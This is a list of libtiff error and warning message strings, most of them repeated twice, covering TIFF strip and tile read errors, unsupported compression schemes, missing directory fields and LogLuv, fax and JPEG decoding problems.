%s: Read error at scanline %lu, strip %lu; got %lu bytes, expected %lu
%s: Read error at scanline %lu; got %lu bytes, expected %lu
%s: Read error at scanline %lu; got %lu bytes, expected %lu
%s: Seek error at scanline %lu, strip %lu
%s: Seek error at scanline %lu, strip %lu
%s: Data buffer too small to hold strip %lu
%s: Data buffer too small to hold strip %lu
%s: Read error on strip %lu; got %lu bytes, expected %lu
%s: Read error on strip %lu; got %lu bytes, expected %lu
%s: Read error at row %ld, col %ld, tile %ld; got %lu bytes, expected %lu
%s: Read error at row %ld, col %ld, tile %ld; got %lu bytes, expected %lu
%s: Read error at row %ld, col %ld; got %lu bytes, expected %lu
%s: Read error at row %ld, col %ld; got %lu bytes, expected %lu
%s: Seek error at row %ld, col %ld, tile %ld
%s: Seek error at row %ld, col %ld, tile %ld
%s: Data buffer too small to hold tile %ld
%s: Data buffer too small to hold tile %ld
%s: No space for data buffer at scanline %ld
%s: No space for data buffer at scanline %ld
Compression scheme %u %s encoding is not implemented
Compression scheme %u %s encoding is not implemented
%s %s encoding is not implemented
%s %s encoding is not implemented
%s %s encoding is no longer implemented due to Unisys patent enforcement
%s %s encoding is no longer implemented due to Unisys patent enforcement
Compression scheme %u %s decoding is not implemented
Compression scheme %u %s decoding is not implemented
%s %s decoding is not implemented
%s %s decoding is not implemented
Compression algorithm does not support random access
Compression algorithm does not support random access
Bogus "%s" field, ignoring and calculating from imagelength
Bogus "%s" field, ignoring and calculating from imagelength
TIFF directory is missing required "%s" field, calculating from imagelength
TIFF directory is missing required "%s" field, calculating from imagelength
wrong data type %d for "%s"; tag ignored
wrong data type %d for "%s"; tag ignored
unknown field with tag %d (0x%x) encountered
unknown field with tag %d (0x%x) encountered
No space %s
No space %s
TIFF directory is missing required "%s" field
TIFF directory is missing required "%s" field
incorrect count for field "%s" (%lu, expecting %lu); tag ignored
incorrect count for field "%s" (%lu, expecting %lu); tag ignored
Error fetching data for field "%s"
Error fetching data for field "%s"
%s: Rational with zero denominator (num = %lu)
%s: Rational with zero denominator (num = %lu)
Cannot handle different per-sample values for field "%s"
Cannot handle different per-sample values for field "%s"
cannot read TIFF_ANY type %d for field "%s"
cannot read TIFF_ANY type %d for field "%s"
"%s": Information lost writing value (%g) as (unsigned) RATIONAL
"%s": Information lost writing value (%g) as (unsigned) RATIONAL
Error writing data for field "%s"
Error writing data for field "%s"
%s: Error writing SubIFD directory link
%s: Error writing SubIFD directory link
%s compression support is not configured
%s compression support is not configured
?%s: No space for LogLuv state block
?%s: No space for LogLuv state block
Inappropriate photometric interpretation %d for SGILog compression; %s
Inappropriate photometric interpretation %d for SGILog compression; %s
LogL16Decode: Not enough data at row %d (short %d pixels)
LogL16Decode: Not enough data at row %d (short %d pixels)
LogLuvDecode24: Not enough data at row %d (short %d pixels)
LogLuvDecode24: Not enough data at row %d (short %d pixels)
LogLuvDecode32: Not enough data at row %d (short %d pixels)
LogLuvDecode32: Not enough data at row %d (short %d pixels)
%s: No space for SGILog translation buffer
%s: No space for SGILog translation buffer
No support for converting user data format to LogL
No support for converting user data format to LogL
No support for converting user data format to LogLuv
No support for converting user data format to LogLuv
SGILog compression supported only for %s, or raw data
SGILog compression supported only for %s, or raw data
Unknown data format %d for LogLuv compression
Unknown data format %d for LogLuv compression
Unknown encoding %d for LogLuv compression
Unknown encoding %d for LogLuv compression
%s: No space for state block
%s: No space for state block
%s: Bad code word at scanline %d (x %lu)
%s: Bad code word at scanline %d (x %lu)
%s: %s at scanline %d (got %lu, expected %lu)
%s: %s at scanline %d (got %lu, expected %lu)
%s: Premature EOF at scanline %d (x %lu)
%s: Premature EOF at scanline %d (x %lu)
%s: No space for Group 3/4 reference line
%s: No space for Group 3/4 reference line
%s: No space for Group 3/4 run arrays
%s: No space for Group 3/4 run arrays
%s: Uncompressed data (not supported) at scanline %d (x %lu)
%s: Uncompressed data (not supported) at scanline %d (x %lu)
Fax SubAddress: %s
Fax SubAddress: %s
(%u = 0x%x)
(%u = 0x%x)
%suncompressed data
%suncompressed data
%sEOL padding
%sEOL padding
%s2-d encoding
%s2-d encoding
Improper JPEG sampling factors %d,%d
Improper JPEG sampling factors %d,%d
Apparently should be %d,%d,decompressor will try reading with sampling %d,%d
Apparently should be %d,%d,decompressor will try reading with sampling %d,%d
Improper JPEG strip/tile size, expected %dx%d, got %dx%d